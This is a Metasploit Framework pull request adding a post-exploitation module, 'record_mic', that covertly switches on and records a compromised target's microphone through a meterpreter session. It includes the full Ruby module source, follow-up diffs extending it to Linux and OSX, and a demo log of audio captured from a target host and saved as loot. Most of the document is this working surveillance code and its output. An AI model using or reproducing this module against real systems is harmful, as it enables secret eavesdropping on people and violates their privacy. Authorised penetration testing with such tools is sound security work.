### PR TITLE
Implements the record_mic feature as a post module

### DIFF
--- a/modules/post/multi/manage/record_mic.rb
+++ b/modules/post/multi/manage/record_mic.rb
@@ -1,0 +1,78 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+require 'rex'
+
+class Metasploit3 < Msf::Post
+
+	include Msf::Auxiliary::Report
+
+	def initialize(info={})
+		super( update_info( info,
+			'Name'          => 'Multi Manage Record Microphone',
+			'Description'   => %q{
+				This module will enable and record your target's microphone.
+			},
+			'License'       => MSF_LICENSE,
+			'Author'        => [ 'sinn3r'],
+			'Platform'      => [ 'win'],
+			'SessionTypes'  => [ 'meterpreter' ]
+		))
+
+		register_options(
+			[
+				OptInt.new('DURATION', [false, 'Number of seconds to record', 5])
+			], self.class)
+	end
+
+	def rhost
+		client.sock.peerhost
+	end
+
+	def progress
+		timeout = (datastore['DURATION'] < 1) ? 1 : (datastore['DURATION']*0.1)
+		datastore['DURATION'].times do |i|
+			print_status("Recording: #{(Float(i+1)/datastore['DURATION'] * 100).round}% done...")
+			select(nil, nil, nil, timeout)
+		end
+	end
+
+	def run
+		if client.nil?
+			print_error("Invalid session ID selected. Make sure the host isn't dead.")
+			return
+		end
+
+		data = nil
+
+		begin
+			t = framework.threads.spawn("prog", false) { progress }
+			data = client.webcam.record_mic(datastore['DURATION'])
+		rescue Rex::Post::Meterpreter::RequestError => e
+			print_error(e.message)
+			return
+		ensure
+			t.kill
+		end
+
+		if data
+			print_status("#{rhost} - Audio size: (#{data.length.to_s} bytes)")
+			p = store_loot(
+				"#{rhost}.webcam.snapshot",
+				'application/octet-stream',
+				rhost,
+				data,
+				"#{rhost}_audio.wav",
+				"#{rhost} Audio Recording"
+			)
+
+			print_good("#{rhost} - Audio recording saved: #{p}")
+		end
+	end
+
+end

--- a/modules/post/multi/manage/record_mic.rb
+++ b/modules/post/multi/manage/record_mic.rb
@@ -16,11 +16,13 @@ class Metasploit3 < Msf::Post
 		super( update_info( info,
 			'Name'          => 'Multi Manage Record Microphone',
 			'Description'   => %q{
-				This module will enable and record your target's microphone.
+					This module will enable and record your target's microphone.
+				For non-Windows targets, please use Java meterpreter to be
+				able to use this feature.
 			},
 			'License'       => MSF_LICENSE,
 			'Author'        => [ 'sinn3r'],
-			'Platform'      => [ 'win'],
+			'Platform'      => [ 'win', 'linux', 'osx' ],
 			'SessionTypes'  => [ 'meterpreter' ]
 		))
 

--- a/modules/post/multi/manage/record_mic.rb
+++ b/modules/post/multi/manage/record_mic.rb
@@ -63,7 +63,7 @@ class Metasploit3 < Msf::Post
 		if data
 			print_status("#{rhost} - Audio size: (#{data.length.to_s} bytes)")
 			p = store_loot(
-				"#{rhost}.webcam.snapshot",
+				"#{rhost}.audio",
 				'application/octet-stream',
 				rhost,
 				data,


### PR DESCRIPTION
For easier deployment in the web GUI. Works for Windows meterpreter and Java meterpreter.

Demo:

```
meterpreter > run post/multi/manage/record_mic 

[*] Recording: 20% done...
[*] Recording: 40% done...
[*] Recording: 60% done...
[*] Recording: 80% done...
[*] Recording: 100% done...
[*] 10.0.1.4 - Audio size: (55169 bytes)
[+] 10.0.1.4 - Audio recording saved: /Users/sinn3r/.msf4/loot/20130117121909_default_10.0.1.4_10.0.1.4.webcam._985360.wav
meterpreter >
```
